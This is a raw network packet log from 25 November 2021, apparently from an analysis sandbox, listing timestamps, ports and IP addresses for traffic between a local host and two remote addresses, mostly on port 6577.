Nov 25, 2021 11:28:28.639316082 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.639517069 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.682002068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.682070017 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.682251930 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.686206102 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.686266899 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.686564922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.691056013 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.780344009 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.954247952 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.002139091 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.111462116 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.112859964 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.113014936 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.168524027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168587923 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168622971 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168653965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168684959 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168715000 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168745995 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168776035 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.168893099 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.169008017 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.221514940 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.221616030 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.221767902 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.221770048 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.221946955 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.221998930 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.222012997 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.222022057 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.222032070 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.222042084 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.222310066 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.222466946 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.273992062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274090052 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274100065 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274107933 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274116039 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274175882 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.274204969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274322987 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274333954 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.274350882 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.274549961 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.274683952 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.326401949 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.326452017 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.326483965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.326518059 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.326724052 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.326831102 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.327667952 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.327934980 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.328305960 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.328402042 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.328490973 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.331943989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.331990004 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.332161903 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.332283020 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.379328966 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.379415989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.379456043 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.379492998 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.379529953 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.379547119 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.379705906 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.379868984 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.384166002 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.384366035 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.438242912 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438294888 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438328981 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438359976 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438390970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438421965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438452959 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.438483000 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.439066887 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.439138889 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.439188004 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.510160923 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510238886 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510276079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510351896 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510385990 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510417938 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510441065 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.510463953 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510514975 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.510608912 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.510775089 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.546566010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.546911955 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:29.627074957 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:29.654717922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.654767036 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.654798031 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.654829025 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.654859066 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.654890060 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.685750961 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:29.970953941 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.017446041 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.114892960 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.115118980 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.115231037 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.115392923 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.115530968 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.152952909 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:30.153224945 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:30.169374943 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169488907 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169497967 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169503927 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169509888 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169516087 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169523001 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.169523954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.169723988 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.169862986 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.169872046 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.171226025 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.171235085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.171322107 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.171395063 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.171452999 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.171459913 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.171596050 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.171766043 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.222783089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.222791910 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.222887993 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.223011017 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.223017931 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.223028898 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.223036051 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.223187923 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.223391056 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.274343967 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.274605989 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.275842905 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.276031017 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.276057005 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.276204109 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.276212931 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.276309013 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.276316881 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.276485920 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.276655912 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.347364902 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.347474098 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.347482920 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.347609997 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.347618103 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.347625017 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.347687006 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.347832918 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.347860098 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.348032951 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.348165035 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.399326086 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.399566889 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.399590969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.399800062 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.399828911 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.399837971 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.399945974 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.399950027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.399960995 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.399967909 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.400063992 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.400145054 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.400316000 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.447590113 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.447895050 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.451441050 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.451554060 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.451683044 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.451698065 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.451812983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.451901913 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.451930046 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.451937914 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.452058077 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.452205896 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.505840063 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.506059885 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.506108999 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.506230116 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.506340027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.506398916 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.506510019 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.506568909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.506625891 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.506736994 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.506876945 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.507046938 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.563079119 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563087940 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563189983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563198090 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563205004 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563210964 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563218117 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.563225031 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.563430071 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.563596010 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.615158081 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.615329981 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.616544008 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.616715908 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.621819973 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.621928930 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.621937990 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.622034073 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.622041941 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.622066975 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.622075081 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.622081995 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.622087955 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.622210026 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.622220039 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.622349977 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.622512102 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.668998957 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.669229031 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.678668976 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.678777933 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.678786039 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.678911924 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.678966045 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:30.714075089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.730108023 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.779829025 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:30.985610962 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.032855988 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.132246971 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.132455111 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.132474899 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.132524014 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.194758892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.194869041 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.194876909 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.194884062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.194890022 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.194896936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.194977999 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.195122004 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.247096062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247253895 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247262955 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247359037 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.247376919 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247385025 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247390985 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247396946 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247528076 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.247698069 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.247742891 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.247961044 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.248167992 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.334613085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.334816933 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.338653088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.338768005 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.338777065 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.338937998 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.339076996 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.339186907 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.339306116 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.339468956 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.339608908 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.373775959 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.374067068 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.386171103 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.386375904 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.390328884 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.390337944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.390542030 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.390564919 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.390741110 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.390881062 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.394570112 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.395153999 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.425297976 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.425565004 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.467654943 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.467664003 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.467746019 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.467755079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.467838049 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.467978954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.467992067 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.476948977 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.477190971 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.525623083 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.525634050 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.525655985 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.525664091 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.525855064 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.526000977 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.528847933 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.529032946 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.607455969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607465029 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607564926 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607573986 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607579947 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607585907 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607593060 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.607719898 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.607861042 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.659863949 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.659876108 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.659964085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.659975052 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.659984112 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.660012960 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.660182953 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.660352945 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.667602062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.667753935 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.667922974 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.732296944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.732474089 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:31.732589960 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.732603073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:31.732724905 CET	6577	49806	193.104.197.85	192.168.11.20
